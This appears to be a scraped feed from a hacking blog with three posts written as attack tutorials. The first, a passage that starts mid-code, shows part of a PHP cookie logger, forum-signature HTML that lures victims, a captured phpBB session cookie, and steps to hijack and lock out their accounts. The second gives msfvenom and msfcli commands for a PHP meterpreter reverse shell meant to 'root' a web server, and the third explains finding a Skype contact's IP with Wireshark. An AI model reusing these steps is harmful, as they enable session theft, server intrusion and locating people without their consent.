0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">exit;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">}</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">echo “Temporary Server Error,Sorry for the inconvenience.”;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">exit;</span><br style="background-color: white; color: #111111; line-height: 19px;" /><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">?></span></span></blockquote>
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 3:</b> Create a new Notepad File and Save it as logfile.txt<br /><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 4:</b> Upload this file to your server<br />cookielogger.php -> http://www.yoursite.com/cookielogger.php<br />logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)<br />fun.gif -> http://www.yoursite.com/fun.gif<br />If you don’t have any Website then you can use the following Website to get a Free Website which has php support :</span></div>
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">http://0fees.net</span></div>
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 5: </b>Go to the victim forum and insert this code in the signature or a post :</span></div>
<blockquote class="tr_bq" style="border-left-color: rgb(170, 170, 170); border-left-style: solid; border-width: 0px 0px 0px 10px; margin: 0px 0px 0px 20px; outline: 0px; padding: 0px 0px 0px 20px; quotes: none; vertical-align: baseline;">
<span style="border: 0px; font-family: 'Courier New', Courier, monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a></span></blockquote>
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 6: </b>When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:</span></div>
<span style="border: 0px; font-family: 'Courier New', Courier, monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9</span></span><span style="border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><br /></span><br />
<div style="background-color: white; border: 0px; color: #111111; line-height: 19px; margin: 5px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: transparent; border: 0px; font-family: 'Trebuchet MS', sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 7:</b> To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.<br /><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step 8:</b> Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.<br /><u style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Note : </u>Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.</span></div>
</div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com2tag:blogger.com,1999:blog-5727431290630009200.post-80277288784688595672013-05-24T09:13:00.002-07:002013-05-24T09:15:11.966-07:00Metasploit - ROOTING Web Server <iframe allowfullscreen="" frameborder="0" height="480" src="http://www.youtube.com/embed/F6301p3Cmmg" width="640"></iframe><br />
<br />
Commands:<br />
<br />
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.21 LPORT=8080 -f raw > shell.php<br />
<br />
<br />
msfcli exploit/multi/handler LHOST=192.168.1.21 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp ELukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com0tag:blogger.com,1999:blog-5727431290630009200.post-91702556283927498852013-05-23T13:27:00.001-07:002013-05-23T13:27:13.565-07:00Rooting Web Server with MetasploitTomorow i will make video and text tutorial on Kali: How to root web server in Metasploit<br />
<br />
Some SS:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy8LqjSIcH3sWaWu0u9hirapIVRUoCa_o5FcIFXxw5oxSrVu6ZljXLSMW8yxZ3ffFu9DzO1tzSxEgEN_ov6bTqAltTcYdxWehEliTcvesvE_sB1O5md1da_pSSQfnsEv5tTwQvMN0eVKA/s1600/Screenshot+from+2013-05-23+22:11:36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy8LqjSIcH3sWaWu0u9hirapIVRUoCa_o5FcIFXxw5oxSrVu6ZljXLSMW8yxZ3ffFu9DzO1tzSxEgEN_ov6bTqAltTcYdxWehEliTcvesvE_sB1O5md1da_pSSQfnsEv5tTwQvMN0eVKA/s320/Screenshot+from+2013-05-23+22:11:36.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH22mUic5bPB5eeDibQ1skGFeSBxX7BKLWv8_dlL1Xlb-E4k3yszwLBYQ1AwWq-SPXsFly4JiiIcJ49eeAPEMJZiAjTKNnuPcYgXygvifkbj2cX68YaVdXcK1T4Q_FLOzSYtltSdBAIrQ/s1600/Screenshot+from+2013-05-23+22%253A16%253A11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH22mUic5bPB5eeDibQ1skGFeSBxX7BKLWv8_dlL1Xlb-E4k3yszwLBYQ1AwWq-SPXsFly4JiiIcJ49eeAPEMJZiAjTKNnuPcYgXygvifkbj2cX68YaVdXcK1T4Q_FLOzSYtltSdBAIrQ/s320/Screenshot+from+2013-05-23+22%253A16%253A11.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com0tag:blogger.com,1999:blog-5727431290630009200.post-46506125925089148642013-05-23T05:00:00.000-07:002013-05-23T05:01:25.449-07:00Get someone's IP from skypeHi, today i will show you how to get someone's IP adress from Skype.<br />
<br />
<br />
You will need: - Wireshark<br />
<br />
In this tutorial i will using Kali Linux.<br />
<br />
<br />
1. Go to Options --> Advanced and see which port your skype is using (my is 27048)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHf01tDUqwVcFjQCBubH_czbSSf8dWgeGLEXXzpuzRHRGyvQ0uczxpKxLkGI9OeypMMUjfIqckrgJIZ2Ch_C9afc4W6N-5O3d4Tns4mR359gqFQzZrEQE00QbFHQOXqHJs4BOYNVdl_5Q/s1600/skype+advanced.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHf01tDUqwVcFjQCBubH_czbSSf8dWgeGLEXXzpuzRHRGyvQ0uczxpKxLkGI9OeypMMUjfIqckrgJIZ2Ch_C9afc4W6N-5O3d4Tns4mR359gqFQzZrEQE00QbFHQOXqHJs4BOYNVdl_5Q/s320/skype+advanced.png" width="320" /></a></div>
<br />
2. Call your victim.<br />
3. Open Wireshark, you can open it by: root@laceratus:~#wireshark<br />
Programms - Kali Linux - Top 10 Security Tools - Wireshark<br />
4. Choose your interface for Capure (my is eth0)<br />
5. Click on Start<br />
6. Find port for skype (my is 27048)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl-KXkOKw6lyKqycH3FPeDPcRI8floje8yYpC5Vs26JwZUVqT22F1C8U0mCh3vLdvsEO0Oh_D6YcxnSLhEdROEvifO_MPLoB7u1Zo-v8H0vVPxdV83Zt-s0u9OqCRq8ONy5PGu-ySeGLY/s1600/Screenshot+from+2013-05-23+13:59:53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl-KXkOKw6lyKqycH3FPeDPcRI8floje8yYpC5Vs26JwZUVqT22F1C8U0mCh3vLdvsEO0Oh_D6YcxnSLhEdROEvifO_MPLoB7u1Zo-v8H0vVPxdV83Zt-s0u9OqCRq8ONy5PGu-ySeGLY/s320/Screenshot+from+2013-05-23+13:59:53.png" width="320" /></a></div>
<br />Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com25